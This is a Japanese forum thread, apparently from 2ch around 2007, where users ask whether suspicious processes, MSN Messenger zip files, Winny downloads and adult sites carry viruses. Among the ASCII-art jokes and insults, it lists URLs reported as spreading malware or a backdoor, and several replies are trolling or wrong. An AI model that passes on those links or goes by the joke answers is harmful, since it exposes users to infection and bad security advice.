
って事は、ウイルスとしての害は無いのか。　よかった。

そういや、まとめにゼオライマーってある?
あれたしか乳首見えてたし、sexシーンもあったはずだけど

すげー誤爆したorz
すまない

まだ載ってないな

ゼオライマーとは…かなりマイナーと言うべきか、それともマニアックというべきか…

マイルーラなら知っているのだが・・・

タスクマネージャを見てみるとTTClearFrame.exeという見慣れないプロセスが走っています。
終了させてみても特に問題ないようです。検索してもそれらしきファイルはなく、ぐぐってもでてきません。
気味悪いです。

日記はチラシの裏にでもどうぞ

レジストリとスタートアップはみたのですが、それらしきプロセスは確認できませんでした。
何かのウイルスでしょうか？

>>570
こういうの使ってプロセスの起動元になっているファイルを探す
ttp://cowscorpion.com/Process/ProExp.html
ttp://cowscorpion.com/Process/stm.html

ファイルパスや起動元のファイルの作成日時から
自分が過去に何やったか類推してみれ

ttp://okwave.jp/qa2931572.html
ごみ箱から検出＝機能していない、という考え方は基本的には出来ません。ごみ箱内で潜伏しつつ活動するマルウェアもあります。ただし、今回見つかったのは隔離が効いた、ということなので、それ自体は大きな危険性はなさそうです。
だからといって…決して楽観視は出来ません。
複数の情報を総合して考えるに、ウイルスバスターでは検出出来ていないDownloader系の感染が存在しているように思われます。この隠れた感染がDC65.exeなどの他のマルウェアをPC内に引き込んでいると見られます。
早期の解決をお望みのようですが…感染の大本がつかめていない上に、他に何が入り込んでいてもおかしくない状況で自体はかなり深刻、感染の除去は容易ではないと考えるべきではないでしょうか。

最も推奨される対応策はリカバリやクリーンインストールによるOSの初期化です。

リカバリせずに何とかしたい、という場合にはウイルスバスター以外の手段で感染をチェックされることを推奨します。検出力に定評のあるカスペルスキーのオンラインスキャン辺りがお勧めです。（ただし、それでも未確認の感染を100%摘発出来るとは限りません）
http://www.kaspersky.co.jp/scanforvirus/?




┐( ⌒ω⌒)┌

Microsoft Help and Support
ウイルス対策ソフトウェア ベンダの一覧
ttp://support.microsoft.com/kb/49500/ja

.avi 　　　 .scrのウィルスファイルをうっかり
メディアプレイヤーで再生しようとしてしまったんですが（もちろん再生などできなかった）
これってダブルクリックしていないからセーフですか？

他のaviファイルと一緒にドラッグしてwmpにドロップして再生しようとしてしまったんです。

タスクマネージャーを見ているんですが
CPU、メモリともなにか活動しているような雰囲気はないのですが・・・。

原田ウィルス不覚にも踏んでしまった。
該当ファイルの削除。書き換えられてしまったファイルの削除済み。
ノートンは立ち上がらなくなり、CDexなどは書き換えられていた。

ローカルセキュリティポリシーがどうも動かないんですが、原田の影響ですかね？

>>574-575
>>14

2007年6月度　サイバークリーンセンター活動実績
https://www.ccc.go.jp/report/200706/0706monthly.html

>>575
ny厨涙目ｗｗｗｗｗｗ

>>575
シマに検体送れ

役に立たねぇスレだな。
氏ねよ

くだらん質問するな

夏ですなぁ・・・

動向を追うならやっぱりここ！セキュリティ・ベンダーのブログ
http://itpro.nikkeibp.co.jp/article/COLUMN/20070723/278015/?ST=security

NetSkyについておしえてください。
メールはMacにて行っております。
7月半ばから知らぬアドレスでNetSky（ネットスキャンの結果判明）を添付されて
ISP、企業名、大学名、フリーメールのアドレスからメールが届きます。
これはワタクシのアドレスを持った誰かのPCが感染してるという判断でよろしいですか？

ワタクシのメーラーに登録された人に勧告メール出してあげた方がよいですか？

ああ　チャーハンが食いたい。

　 ∧,,∧
　(　・ω・）　　呼んだ？
　/　ｏｏ━ヽニニフ
　しー-Ｊ

食びたい

>>587
（交差法：目を寄せる）
　 ∧,,∧　　　　　　　飛び出す　　　　　　 　 　 　 ∧,,∧　　　　　　 　 飛び出す
　(；`・ω・）　　｡･ﾟ ･⌒）チャーハン作るよ！！　(；`・ω・）　　 ｡ ･ﾟ･⌒） チャーハン作るよ！！
　/　　 ｏ━ヽニニフ))　　　　　　　　　　　　　　 　/　　　ｏ ━ヽニニフ ))
　しー-Ｊ　　　　　　　　　　　　　　　　　 　 　 　 　しー-Ｊ

　　　　　　　　アッ！　｡･ﾟ･ 　　　　　　　　 　 　 　　　　　　　　アッ！　 ｡ ･ ﾟ･
　 ∧,,∧ て　　　　　｡･ﾟ･｡ ･ ﾟ･　　　　　 　 　 　 　 ∧,,∧　て 　　　　 ｡･ ﾟ･ ｡ ･ﾟ･
　(； ´ﾟωﾟ）て　　　／／　　　　　　　　　　　　　 　(； ´ﾟωﾟ）　て　　／／
　/　　 ｏ━ヽニニフ　　　　　　　　　　　　 　 　 　/　　　ｏ ━ヽニニフ
　しー-Ｊ　　 　彡　　　　　　　　　　　　　　　 　 　しー-Ｊ　　　　彡

　　　　∧,,∧　　　　ｼｮﾎﾞｰﾝ　　　　　　　　　　　　　　　∧,,∧　　　　ｼｮﾎﾞｰﾝ
　　　（ ´・ω・）　　　　　　　　　　　　　　　 　 　 　　　（ ´・ω・）
　　c(,＿Ｕ_Ｕ　　　　　　･ﾟ･｡･ ﾟ･｡･ﾟ･ ｡･ﾟ･　　　　　　c(,＿Ｕ_Ｕ　　　　　　 ･ﾟ･｡･ ﾟ･｡･ﾟ･ ｡･ﾟ･
　　　　　━ヽニニフ　　　　　　　　　　　　　　　 　　　　　　━ヽニニフ

　　　　　　　　　　　　よしバレてない 　　　　　 　　　　　　　　　　　　よしバレてない
　　　　　　 ｸﾙｯ　∧,,∧　　　　　　　　　　　　　 　　　　　　 ｸﾙｯ　∧,,∧
　　　　　　　 　ﾐ（・ω・´ ）つ ｻｯｻ 　 　 　 　 　 　　　　　　　 　ﾐ（・ω・´ ） つ ｻｯｻ
　　 　　　　　　c( Ｕ･ ﾟＵ｡彡･ ｡･ﾟ･ 　 　 　 　 　 　　 　　　　　　c( Ｕ･ ﾟ Ｕ｡彡･ ｡ ･ﾟ ･
　━ヽニニフ　　　　　　　　　　　　　　　　　　　 　　━ヽニニフ

　∧,,∧　　　｡･｡ﾟ･｡ ﾟ･｡ﾟ･できたよ〜.　　 　　　 　∧,,∧　　　　｡･｡ﾟ･｡ ﾟ･｡ﾟ･ できたよ〜.
（ ´・ω・）つ＼･ﾟ･ ｡･ﾟ･･／ 　 　 　 　 　 　 　 　 （ ´・ω・）つ　＼･ﾟ･ ｡･ﾟ･･／

ﾌｯﾌｯﾌ・・・　　見てた。

　　　　　　　　　　　　　　∧ ∧ ∧,,∧,,∧∧,,∧
　　　　　　　　　　　　　　( (-( -( - ( -д(　-д)　　｡･ﾟ･⌒）
　　　　　　　　　　　　　　（つ（つ/つ/／　　二つ━ヽニニフ))
　　　　　　　　　　　　ﾁｧ─) .| /（ ヽノ　　ﾉヽっ ─･･･
　　　　　　　　　　　　　　　∪∪とノ(／￣　∪

　　　　　　　　　　　　　　　　　　　　　　　　　　　 ∧　　　　｡･ﾟ･⌒）
　　　　　　　　　(｡･ﾟ･⌒((　 (＼＿ ∧,,∧ ∧,,∧　Д)っ━ヽニニフ))
　　　　　　　　　ヽニニフ━⊂｀ヽ( -д-)　_)д-) )　　ﾉﾉ｡･ﾟ･⌒）
　　　　　　　　　　　　　　ヽ　⊂＼　　⊂ ）　　＿つ━ヽニニフ))
　　　　　　　　　　　　ｱｧ──(／（ /∪∪ヽ)ヽ)　ﾉ ──
　　　　　　　　　　　　　　　　　　∪￣(／￣＼)

　　　　　　　　　　　　 ｡･ﾟ･｡･ﾟ･
　　　　　　　　　　　　 ヽニニフ━(＼　 ∧ ,,∧　　
　　　　　　　　　　　　　　　　　　　　< ｀( `-ω・)
　　　　　　　　　　　　　　　　　　　　　＼　ｙ⊂ ）　──…
　　　　　　　　　　　　　　　　　　　　　／　　　　＼
　　　　　　　　　　　　　　　　　　　　　∪￣￣￣＼)

　　　　　　　　　　　　　　　　　　　　　　･ﾟ･･ﾟ･｡･
　　　　　　　　　　　　　　　　　　　ｏ━ヽニニフ
　　　　　　　　　　　　　　　　　　　　ヽ ( `・ω・）　　ハン !!
　　　　　　　　　　　　　　　　　　　　　ヽ　　⊂ ）
　　　　　　　　　　　　　　　　　　　　　　しー-ヽ)��

　　　　　　　　　　　　　　　ﾟ･　｡　　･｡
　　　　　　　　　　　　　　　｡･ﾟ･⌒）
　　−＝≡　　　 _　_ ｏ━ヽニニフ ))
　−＝≡　　　(　ﾟ∀ﾟ)彡｡･ﾟ｡･⌒）
−＝≡　　　⊂　 　ｏ━ヽニニフ ))
　−＝≡　　 （　⌒)　　チャーハン！チャーハン！
　　−＝≡　　c し'


チャーハン！！チャーハン！！
　　　　 ﾟ･　｡　　･｡　ﾟ･　｡　　･｡ 　　　 ﾟ･　｡　　･｡　ﾟ･　｡　　･｡
　　　　　　　 ﾟ･　｡　｡･ﾟ･⌒ヽ　｡･ﾟ｡･　　　　　　　　　　ﾟ･　｡　｡･ﾟ･⌒）
......................　　　 −＝≡　((　ヽニニフ━o　 _　_ ｏ━ヽニニフ )) ･｡
......................　　　 −＝≡((ヽニ（⌒｡･ﾟ｡･ ミ (　ﾟ∀ﾟ)彡｡･ﾟ｡･⌒） ニフ ))
.......................　　　 −＝≡　　　((ヽニニフ━o　 　ｏ━ヽニニフ )) ﾟ･
............................　　 −＝≡((.ヽニ（⌒･ﾟ･。彡 （　⌒)　ミ　｡･ﾟ･⌒）フ ))
　ﾟ･　｡　　･｡　ﾟ･　｡　−＝≡((ヽニニフ━o　c し'　ｏ━ヽニニフ ))

　　　　　　　　　　　　　｡･　　　　　　　　　　　　　　｡･
　　　　　　　　　　　　｡･　　　　　　　　　　　　　　　｡･ﾟ･
　　　　　　　　　　　｡･　　　　　　　　　　　　　　　｡･ﾟ･｡･ﾟ･
　　　　　　　　　　｡･　　　　　　　　　　　　　　　　｡･ﾟ･　｡･ﾟ･
　　　　　　　　　｡･　　　　　　　　　　　　　　　｡･ﾟ･　｡･ﾟ･｡･ﾟ･
　　　　　　　　｡･　　　　　　　　　　　　｡･ﾟ･｡･ﾟ･｡･ﾟ･　｡･ﾟ･｡･ﾟ･
　　　　　　　　｡･　　　　　　　　｡･ﾟ･｡･ﾟ･　｡･ﾟ･｡･ﾟ･　｡･ﾟ･　｡･ﾟ･
　 ∧,,∧ 　　｡･　　　｡･ﾟ･｡｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･ﾟ　･｡･ﾟ･｡･ﾟ｡･ﾟ･
　(；`・ω・）　｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･　｡･ﾟ･｡･ﾟ･｡･
　/　　 ｏ━ヽニニニニニニニニニニニニニニニニニニフ)) 　　チャーハン作るよ！！
　しー-Ｊ


　　　　　　　　　ドドドドドドドドドドドド！！！！
｡･ﾟ･
　｡･ﾟ･｡･ﾟ･　｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･
｡･ﾟ･　｡･ﾟ･･｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･･ﾟ･｡･ﾟ･｡･ﾟ･｡･
･｡･･｡･ﾟ･　｡･ﾟ･｡･ﾟ･･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･　｡･ﾟ･｡･ﾟ･
｡･ﾟ･｡･｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･　｡･ﾟ･･ﾟ･｡･｡･ﾟ･　｡･ﾟ･｡･ﾟ･
　･｡･｡･ﾟ･｡･ﾟ･　｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･　｡｡･ﾟ･｡･ﾟ･　｡･ﾟ･　｡･ﾟ･
｡･ﾟ･｡･ﾟ･　｡･ﾟ･｡･ﾟ･ﾟ･｡･ﾟ･･ﾟ･･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟ･ﾟ　･｡･ﾟ･｡･ﾟ｡･ﾟ･
　(；`・｡･ﾟ･｡･ﾟ･　｡･ﾟ･｡･ﾟ｡･ﾟ･｡･ﾟ･｡･ﾟ･｡･ﾟﾟ･｡･ﾟ･｡･ﾟ･　｡･ﾟ･｡･ﾟ･｡･
　/　･｡･･｡･ヽニニニニニニニニニニニニニニニニニニフ)) 　　ぐおおおお！！
　し･｡･･｡･

　　　　　　━ヽニニフ 　　　
　　　　　　━ヽニニフ 　　　　　　　　　　　　　
　　　　　　━ヽニニフ 　　　
　　　　　　━ヽニニフ 　　　 ∧ ,, ∧
　　　　　　━ヽニニフ 　　　（ ´・ω・）　みなさん、チャーハンは
　　　　　|￣￣￣￣￣|─□（ 　つ_０　　 　　自分で作ってね
　　〜 〜￣◎￣◎￣　　　◎ヽJ┴◎

スミマセン。教えてください。
ネットで取り込んだフリーＧＩＦ画像を会社の資料の一部で
利用した所、「ウィルスが入ってたらどうすんだ？？」と怒られました、、、（涙
私のような素人認識だと、アプリケーション起動によって感染など聞くのですが
そんなウィルスあるんでしょうか？

>>594
腐るほどあるわな、このへんで覗いておいで

勇気がなくて踏めない人のための鑑定ｽﾚPart15
ttp://pc11.2ch.net/test/read.cgi/hack/1184605923/

早速覗いてきました。ＪＰＥＧの件はいろいろ調べたのですが
やっぱり一緒なんですかね、、、
なかったら上司に異議申し立てようと思ってたのですが、残念！

>>596
そんなもん
「あんたやあるまいし、使うもんはちゃんとﾁｪｯｸくらいしとるわﾄﾞｱﾎ」て
ゆ〜たり
>ネットで取り込んだ
ｳｨﾙｽ入りなら画像開いた時点で感染済やわｗ

>>597
笑
ですね。言っときます！ありがとうでした＾＾

お、頑張り

ノートンのウイルス駆除ソフト「ノートンアンチウイルス２００６」なんですが、
前回更新してから１年が経ちます。そこで質問なんですが、
更新期限が過ぎても更新しなかった場合、

�@最新のウイルスに対応するアップデートが出来なくなるだけで、
　 ソフト自体は使えるんですか？

�Aそれともタイマーみたいなのが仕込まれてて、
　 更新しなければいかなる場合でも使用できなくなるんですか？

どっちですか？

>>600
　 ∧,,∧　　　　　　　1だよ！
　(；`・ω・）　　｡･ﾟ ･　
　/　　 ｏ━ヽニニフ))　
　しー-Ｊ　

ノートンアンチウイルス2005をパターン更新して使ってるんですが
2007に変えると何か劇的な変化とかあるんでしょうか？

すぐ彼女が出来る ! !

>>602
スレ違い

【ﾉｰﾄﾝ】Norton Internet Security Ver.117【2007】
http://pc11.2ch.net/test/read.cgi/sec/1185988933/

>>601さん�dｸｽ！

だとするならどうでしょうね？ウイルスなんて古いものばかりのようなイメージがあるのですが・・
しかも２年間ウイルスもブラクラも踏んでないし・・・更新料５０００円もったいない？

>>605
ｳｨﾙｽ定義ﾌｧｲﾙならｻｲﾄでDL

>>605
泣かない自信と、賠償請求に応じられる財力があるなら、お好きにどうぞ。

【使用OS】2000
【Microsoft Updateの状態】　最新
【使用セキュリティソフトとバージョン】　avst
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　最新
【スパイウェア対策ソフト】　spy-bot　ad-ware　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　最新
【ルータの有無】　有り
【症状】　AntiVirでスキャンしたら『SpoonUninstall.exe』っていうのが見つかりました。

調べても何をするものか分からないのでどなたかご教授願います・・・。

>>608の【使用セキュリティソフトとバージョン】はAntiVirでした。
すいません。

uninstall_flash_player.exeをFlashの日本語ページで落とすと、言語のプロパティが韓国語になるのですが
同じような現象出た人いますか？

ノ

スレチだと思いますが携帯にもウィルスってあるんでしょうか…？
板が分からなかったのですみません

>>611
ノシ

>>612
あるよ。

原田踏んだ・・・
すぐ電源落として再起動をかけたら、とりあえずWinny以外のフォルダには特に影響がなかったみたいです。
Program Filesフォルダは中身が無事だったもので。
ただし同フォルダ一番下のUninstall_CDS.exeのアイコンが例の画像に変わってます。
これをどうにかできませんかね？

追記
というか、このファイルは原田感染後に出てきたもの？

立ち去れ

すいません。テンプレ読んでませんでした。
【使用OS】WindowsXP Professional
【Microsoft Update（MU）の状態】つい最近行ったので、恐らく最新
【使用セキュリティソフトとバージョン】Norton Internet Security2007(バージョン10.0.0.86）
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最新
【スパイウェア対策ソフト】なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】ないのでやってない
【ルータの有無】有

現在システムの完全スキャン中なので、結果は後ほど載せます

書き換えられたファイルはどうにもならない
以上

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
低レベルのTracking Cookieを検出したと表示されていましたが、これはずっと以前からあったもので、
今回の件には関係ないものだと思われます。それ以外は特になし。
【どんな症状が出るか】さきほども言ったように、Uninstall_CDS.exeのアイコンが例の画像になってました。
Winnyはフォルダの内容がのほとんどが例の画像や拡張子が.bmpに変えられたものばかりになっていた。
他のファイルももちろん調べましたが、例の画像を含んだフォルダや、
拡張子がBMPに変えられたファイルを含んだフォルダはなし。
【症状が出る前に何をやったか】nyで落とした動画ファイル（ひぐらしのなく頃に解　第４話）を見ようとしていた。
　　　　　　　　　　　　　　　　　　　　恐らくそれが原因。拡張子が.exeか.scrだったものと思われる。
【症状を解決しようとどのような処置を取ったか】まずWinnyフォルダをまとめて削除。後にNortonによる完全スキャン。
【その他の質問】Uninstall_CDS.exeがこうなった以上、OS再インスコしかないのでしょうか？

>>615
>>13

スレ違いです

ノートンの更新期限が切れたんだけど、更新延長のウインドウがパソコンを起動する度に表示され、
他にも不定期に表示される様になり、ウザイったらありゃしない。今まで使ってきた感想を言うと、
ノートン自体がウイルスでした。今度買うときはウイルスバスターにします

漫才師になれるぞ。

突然質問してすみません。
あるサイトにつなげたら、ウインドウズの画面がそっくりそのまま横になってしまったのですが、
元に戻すにはどうしたらよいのでしょうか？

笑うところだよな？

>>624
ｽﾚ違い
Ctrl + Alt + ↑

なおりました！！本当にありがとうございました！！

下記のサイトを見ると警告が出るのですがこれってウイルスですかね？
もしウイルスだったら店に知らせてあげて下さい。

萌えゲッチュ　http://www.lemonades.jp/　年齢認証（18歳以上）押すと
ワンピース　http://www.onepiece-net.com/　年齢認証（18歳以上）押すと
ツーピース　http://www.twopiece-net.com/　年齢認証（18歳以上）押すと
カジュアル　http://www.ik-casual.net/

http://www.4563maturemovies.com/
このサイトのウイルスはどの様な悪影響を及ぼしますか？教えて下さい。

>>628
何のソフトが出した警告か書かないとわからんだろ
バスターのURLフィルタがアダルトサイト警告でも出したってオチは無しな

>>629
2005-searchのリンクがあるから
アドウェア（といってもほぼマルウェアに近い）のインストールじゃねえかな

>>630

アンチウイルスではエラーメッセージ
ウイルスキラーでウイルス検出しましたという警告

下記のサイトを見ると警告が出るのですがこれってウイルスですかね？
もしウイルスだったら店に知らせてあげて下さい。

萌えゲッチュ　http://www.lemonades.jp/　年齢認証（18歳以上）押すと

新手の広告か

キーボードのiとeとoとuを押しても文字が打てないんですけど、これってウイルスですか？

ki-bo-donoitoetootouwoositemomojikautenainndesukedo,koretteuirusudesuka?

>>634
クリーンリカバリー

クリーンリカバリー　

う〜む　　難しいなぁ・・・

ググレカレー

ttp://ddo-jp.ddo.jp/download.php?no=13340
ここで配布されている物バックドアみたいなんですが…
jsf.exe開いたらアウトですか？

因みにウイルスバスター2006入れてますが、開いた時何も検出しませんでした…
トロイですかねぇ？

クリーンリカバリーって？？

>>639-640
既に落とせないから知らん。
どっかにアップし直してくれ。

>>642
すみませんが自分自身も削除してしまったので、再うｐは無理です。
解決法も模索した物の、よく分からないのでOS入れなおして不安解消します。
お騒がせしました。

ttp://www.girlsbar-chelsea.com/
上記のページ(ガールズバーのサイトです)を開いた際、
ノートンが反応し「疑わしいスクリプト」として遮断しました。
temporary internet filesを見たところ、norton.exeというファイルがあり、
とりあえずそれは消してしまいました。

現在ウイルススキャン中なのですが、これは既知のものでしょうか?
ファイル名でぐぐってみたのですが、該当するものがよくわかりませんでした。

Adware Casinoにかかってしまいました

ＯＳはXP　セキュリティソフトはウイルスバスター１４です
出来れば危険性や対策を教えてほしいです
お願いします

>>624>>626
そんな機能があるの初めて知ったよ。

Windowsのノートパソコンです。
メール受信ボックスに英語で「私の事好き？」の件名で送信者はバージニアでした。
クリップみたいなのが件名の前についていて怖くて開けません。
最近PC初めたばかりで主にヤフオクとユウチュウブしか見てない超初心者です…どうしたら良いでしょうか？

【使用OS】
　「Windows2000 Service Pack 4」
【Microsoft Update（MU）の状態】
　「今朝自動Windows Update済み」　
【使用セキュリティソフトとバージョン】　
「ウイルスバスター2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　
「パターン定義 4.637.00」　
【スパイウェア対策ソフト】
　「無し」　
【ルータの有無】
　「あり」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「ウィルススキャン未検出」

【どんな症状が出るか】　
「英文と共にウイルスが入ったZIPファイルをMSN Messengerのオンラインメンバー全員に送信を試みる。」
【症状が出る前に何をやったか】
　「look @ my pretty puppyと共に送られてきたファイルimg1756.zipを解凍し、中に入っていたimg1756.scrファイルを起動した」
【症状を解決しようとどのような処置を取ったか】　
「メッセンジャー強制終了、ウィルスバスター2007で完全スキャン、カペルスキーで、ウイルスファイルをスキャン」

>>648 これやばいな
いろんな人から送られてきたから相当数が感染してるようだ
送信者全員感染してるでおｋ？

>>649
さっき同じような感じで送られてきたぜ。
めちゃくちゃ怪しかったんでファイル受信拒否ったけど。

>>649
送信者全員感染でOK
４人から似たような時間に送られてきて笑ったｗ

W32.Mubla.B
って名前で脳豚の定義ファイルは更新されてるな

【使用OS】　Windows XP Pro
【Microsoft Update（MU）の状態】　最新
【使用セキュリティソフトとバージョン】　Noton Internet Security バージョン10.2.0.30
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　Yes
【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
なにも検索されていない

【どんな症状が出るか】　ファイルを開いた直後にMSNの窓が開かなくなる。MSNでオンライン中のアドレスに自動で同じファイルを送信する
【症状が出る前に何をやったか】　MSNで知人から
I just took this picture with my webcam, like it?　
　というメッセージとともに
img1756.zipというファイルが添付されていたのでノートンをかけたが異常無し
中身はスクリーンセーバのファイル。開くと上記のような上体になる
【症状を解決しようとどのような処置を取ったか】　再起動(再起動でMSNの窓は開くことができた)
　ノートンでウイルス検索、テンプレにあるオンラインスキャン実施
【その他の質問】　ファイル名でググると8月8日付けのブログでウイルスであることが判明
ここに至りますが、正直なにが起こっているのか全くわかりません
なにか詳しい情報や対策など教えていただきたいです

>>649 652
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2007-080614-3458-99&tabid=2

それ程深刻なウィルスでは無いっぽい

>>646
IntelのオンボVGAの機能。

Messengerから感染するマルウェアが見つかった
http://pc11.2ch.net/test/read.cgi/software/1086995317/421

PCからずっと「ピーーーー・・・･･……」と言う音が鳴っててうるさいんだけど、
これはウィルスの類ですか？

ちゃんとテンプレで書きなおしました。

【使用OS】　「XP　多分ホームエディション」
【Microsoft Update（MU）の状態】　「ちゃんとやってる」　
【使用セキュリティソフトとバージョン】　「多分ファイヤーウォール」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「されてる」　
【スパイウェア対策ソフト】　「なし」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「無いのでしてない」
【ルータの有無】　「ルータとは何ですか？」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「スキャンは今PC全体をやってみてる」

【どんな症状が出るか】　「PCから「ピー」と言う音が鳴り止まない」
【症状が出る前に何をやったか】　「winny」
【症状を解決しようとどのような処置を取ったか】　「winny閉じた。」
【その他の質問】　「これはウィルスですか？そうじゃないとしたら何ですか？」

ネタにマジレス。

メモリ死亡。

メモリ死亡ってなんですか？

メモリがインポテンツになることだよ

それって直らないんですか？

下記のサイトを見ると警告が出るのですがこれってウイルスですかね？
もしウイルスだったら店に知らせてあげて下さい。

萌えdoru　http://www.lemonades.jp/　年齢認証（18歳以上）押すと
ワンピース　http://www.onepiece-net.com/　年齢認証（18歳以上）押すと
ツーピース　http://www.twopiece-net.com/　年齢認証（18歳以上）押すと
カジュアル　http://www.ik-casual.net/

>>662
ワンクリ乙

【使用OS】　「WindowsXP Home edition」
【Microsoft Update（MU）の状態】　「最新」　
【使用セキュリティソフトとバージョン】　「Norton360」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新」　
【スパイウェア対策ソフト】　「上と同じ」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「最新」
【ルータの有無】　「なし」
友人のMSNメッセンジャーから「img1756.zip」というファイルがおくられてきて、それを受信、解凍したうえで、出てきたファイルimg1756.srcをクリックしてしまいました
メッセンジャーが使用不能になったので、どうしたんだろ？と思いつつ再起動しました
再起動後、すぐに別の友人が「img1756.zip」についての情報を、流行ってるから気をつけろよと教えてくれたのですがどうやらウイルスのようです
シマンテックのホームページで確認したところ、昨日の時点で対策はとられてるようでした
しかし、自分のノートン360は８日にアップデートしていて最新版のはずなのに、問題のファイルを開く前も、開いたあとも、検出は一切されませんでした
何に問題があるのでしょうか？

>>664
ノートン以外を使うといいよ

>>664
同名のファイルで何種類か出回ってるとかいう話は聞いた

>>664
.src じゃなくて .scr (スクリーンセーバー) だろうけど。

scrの中身はexeと一緒だからね。単に名前違うだけ。

>>648
そもそもなんで解凍するか理解不能。
英文の意味不明なメールを開く時点でイミフだけど。

メッセンジャー使ってる奴は皆そんなアホだよ。

外人の連絡相手の３人や４人いるだろ。

メールじゃなくてインスタントメッセージね。
ファイルはメッセンジャーの送信機能を使った物

HTTP LOP Toolbar Activity←これは、なんなのですか？

>>672
どうぞttp://www.google.com/search?hl=ja&q=HTTP+LOP+Toolbar+Activity&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

【使用OS】　「XP SP2」
【Microsoft Update（MU）の状態】　「半年〜一年ほどやってません」　
【使用セキュリティソフトとバージョン】　「AntiVir パーソナルエディション」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「してます」　
【スパイウェア対策ソフト】　「spy bot,AD-Aware」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「スキャンの前だけ（常駐じゃない）」
【ルータの有無】　「あり」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「SOUNDMAN（これを消しても続いたので関係ない？）」

【どんな症状が出るか】　「ジェットコースターで叫んでるjpg画像がそれぞれ８０個ほど
デスクトップ・マイドキュメント・マイピクチャに、ＰＣ起動ごとに出る
これがその画像ですttp://up.spawn.jp/file/up41105.jpg」
【症状が出る前に何をやったか】　「あやしいexeを開いた（消してしまった）」
【症状を解決しようとどのような処置を取ったか】　「ウイルス・スパイウェアのスキャン＆削除」
【その他の質問】　「実害はないかも知れませんが、他のところでも悪さをしているかも・・・。
なんていうウィルスか、その対処法も教えて欲しいです」

【Microsoft Update（MU）の状態】　「半年〜一年ほどやってません」

今すぐやって出直せ。

>>675
やってきましたが、まだ出てきました・・・。

よかったね(^0^)/

答えがでないようなのでほかのところでも質問してきます

[国＋]【アメリカ・インターネット】Wikipediaの執筆者を暴露するツールが登場[08/16]
http://headline.2ch.net/test/read.cgi/bbynews/1187358066/

セキュリティ板＠削除議論・自治スレッド
http://qb5.2ch.net/test/read.cgi/sakud/1090504381/

強制IDや強制リモホ表示の是非について投票募ってます。
ある程度意見溜まったら申請出しますのでご協力お願いします。
コピペで失礼しました。ｍ(＿＿)ｍ

【悪質】もはや技術的に検出できないアンチウイルスも出てきた【多機能ウイルス】
http://pc11.2ch.net/test/read.cgi/software/1086995317/428

プログラムの追加と削除に　IndicatourUtility　てのがあるんですけど
ウイルスですか？ 緑の太陽みたいなアイコンです

ttp://www.google.co.jp/search?hl=ja&q=%22IndicatorUtility%22

RTF埋め込み.exeは割と簡単に拡張子偽造できる。RLOは使えないけど。
IE6以前だと警告画面出ないらしいし。　
まあだけど普通は実行時に例の警告画面出るから気がつくとは思うけど。

ウイルスに感染したら最終措置は初期化ですか？

神　PCを止める
上　初期化
並　駆除
貧　静観

ttp://society6.2ch.net/test/read.cgi/koumei/1166498286/
すいません質問があります。
これは公明党のスレなんですけど、たまたまサッカーの板のスレに
貼り付けられていて、覗いてみたらすぐに画面の隣の方から
ウイルスに感染しましたという赤色のタグがでてきました。
スレを見ただけでウイルスに感染することなんてあるんですか？
それとも驚かせるつもりでウイルスもどきの仕掛けをしただけ？

バーカwwww

>687
これは釣りなのか、マジなのか、それとも釣るつもりなのか。
スレがスレだけに悩むな。

ああ、すいません。スレには騙されて飛ばされたと書かれていますが
相談に関しては騙しではないです。

7 ：あ：2007/08/21(火) 04:35:58 ID:eQSZJLJ+0
【サッカー】日本対カメルーン戦（九州石油ドーム）で地元大分出身の山崎ハコさんが日本一陰気な「君が代」を披露へ
http://society6.2ch.net/test/read.cgi/koumei/1166498286/

これです。これがサッカー板に貼り付けられていて、開いたんです。
公明党のスレだったんですけど、ウイルスが検出されましたというのが
でてきたんです。
試しにもう一度開いたところ、再び検出されました。
だけど今のは自動的に駆除されたようです。
昨日のは駆除されてません。ウイルスの名前はVBS/LoveLetter@MMというものです。

>>690
ノートントラップ
http://www.media-k.co.jp/jiten/wiki.cgi?%A1%E3%A4%CE%A1%E4#i7

>>690
お前、ここでマルチする前に他スレで丁寧に質問に答えてくれた鑑定人さんに
ちゃんとお礼したらどうなんだ？

初質で聞いていた奴か
放っておけ。馬鹿につける薬は無い

最後に、言うまでも無いことだとは思うが、
答えてくれた人達に礼の言葉を返すなど言語道断である。
せっかく「教えてクン」を貫いてきたのに、最後にお礼を言っているようでは、
画竜点睛を欠いていると言わざるを得ない。
質問だけしておいて、後はシカトが基本である。
ttp://www.redout.net/data/osietekun.html

★質問用テンプレ★
【使用OS】　「XP SP2」
【Microsoft Update（MU）の状態】　「最新かと」　
【使用セキュリティソフトとバージョン】　「ウイルスバスター2006」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新です」　
【スパイウェア対策ソフト】　「同上」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「はい」
